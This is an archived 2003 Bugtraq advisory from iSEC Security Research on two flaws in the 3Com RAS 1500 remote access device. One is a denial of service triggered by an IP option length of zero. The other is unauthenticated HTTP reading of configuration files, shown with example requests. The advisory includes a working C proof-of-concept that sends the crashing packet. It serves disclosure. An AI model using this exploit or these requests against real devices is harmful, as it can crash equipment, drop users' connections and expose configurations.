lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <Pine.LNX.4.44.0303241654110.17806-100000@isec.pl>
Date: Mon, 24 Mar 2003 16:56:21 +0100 (CET)
From: Piotr Chytla <pch@...c.pl>
To: bugtraq@...urityfocus.com, <vulnwatch@...nwatch.org>
Subject: 3com RAS 1500 Remote vulnerabilities.


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Synopsis:   3com RAS 1500 Remote vulnerabilities. 
Product:    3C433279A-US http://www.3com/ras1500
Version:    Firmware X2.0.10

URL:        http://isec.pl/vulnerabilities/isec-0009-3com-ras.txt
Author:     Piotr Chytla <pch@...c.pl>
Date:       February 27, 2003


Issue:
- ------

 3com SuperStack II Remote Access System 1500 is telco device which 
 provides access via BRI-ISDN/Analog to dialin users. 
 It contains two remote vulnerabilities, first is Denial Of Service that 
 leads to system crash, second can be used to read configuration files. 


Details:
- -------

1. Remote Denial of Service 

 It is possible to remotely reboot RAS 1500 (Router unit) system by sending
 malformed packet with ip option len field set to zero. This bug can cause 
 loosing all switched connections on PRI-ISDN interface.

2. Configuration file read

 Unauthorized user can read configuration and system files, using web
 interface on RAS 1500 .
 
    GET /download.htm HTTP/1.0 
    HTTP/1.0 401 Unauthorized
    WWW-Authenticate: Basic realm="RAS1500"
    Content-Type: text/html
    Server: Allegro-Software-RomPager/2.10
 
    GET /user_settings.cfg HTTP/1.0
    HTTP/1.0 200 OK
    Content-Type: multipart
    Date: Mon, 25 May 1998 00:26:38 GMT
    Last-Modified: Tue, 01 Jan 1901 00:00:01 GMT
    Content-Length: 1258
    Server: Allegro-Software-RomPager/2.10
    [..]
    
    content of user_setting.cfg

 RAS 1500 requires HTTP basic authorization only for download.htm file,
 which is download manager for configuration files and system software.
 Unfortunately system images and configuration files are not protected by
 HTTP authorization.

Impact:
- -------
 
 Malicious user is able to remotely crash RAS 1500 - Router Unit, this 
 cause dropping all switched connections to PRI-ISDN interface. 
 Remote attacker can also read and modify RAS configuration when he broke 
 access passwords.


Exploit:
- --------
Below is attached a working proof-of-concept exploit for vulnerability no.1. 
 
- ------X<------isec-options.c------X<------
/* 
 * 3com superstack II RAS 1500 remote Denial of Service
 *
 * Piotr Chytla <pch@...c.pl>
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*
 * IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY
 *
 * (c) 2003 Copyright by iSEC Security Research
 */
 
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <libnet.h>
#define OPT_LEN 4
void usage()
{
  printf("Args: \n");
  printf("-s [source address]\n");
  printf("-d [destination address]\n");
}

int main(int argc,char *argv[]) 
{
 char a;
 int sock,r;
 u_long src;
 u_long dst;
 char pktbuf[IP_MAXPACKET];
 char payload[]="ABCDEFGHIJKLMNOPRST";
 u_char options[4];
 struct ipoption ipopt;
 bzero(options,OPT_LEN);
 while((a=getopt(argc,argv,"d:s:h?"))!=EOF)
 {
     switch(a) {
         case 'h' : { usage(); exit(1); }
         case 's' : { src=libnet_name_resolve(optarg,0); break;}
         case 'd' : { dst=libnet_name_resolve(optarg,0); break;}
        }
 }
 sock = libnet_open_raw_sock(IPPROTO_RAW);
 if (sock<0)
 {
 perror("socket");
 exit(1);
 }

 libnet_build_ip(strlen(payload),0,0x1337,0,255,0xaa,src,dst,payload,strlen(payload),pktbuf);
  memcpy(ipopt.ipopt_list, options, OPT_LEN);
  *(ipopt.ipopt_list)     = 0xe4;
  *(ipopt.ipopt_list+1)   = 0;
  *(ipopt.ipopt_list+1)   = 0;
  *(ipopt.ipopt_list+1)   = 0;
  r=libnet_insert_ipo(&ipopt,OPT_LEN,pktbuf);
  if (r <0)
   {
        libnet_close_raw_sock(sock); 
        printf("Error ip options insertion failed\n");
        exit(1);
   }
  r=libnet_write_ip(sock,pktbuf,LIBNET_IP_H+OPT_LEN+strlen(payload));
  if (r<0)
  {
   libnet_close_raw_sock(sock);
   printf("Error write_ip \n");
   exit(1);
  }  
 libnet_close_raw_sock(sock);
 return 0;
}

- ------X<------isec-options.c------X<------
 
- -- 
Piotr Chytla
iSEC Security Research
http://isec.pl/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQE+fylwC+8U3Z5wpu4RAr7MAKDqCSwMeF78nlFiSRATmAmgTyfeHQCg09cg
kkYmmXxc8sgurfL8XUhGo2s=
=bAQc
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ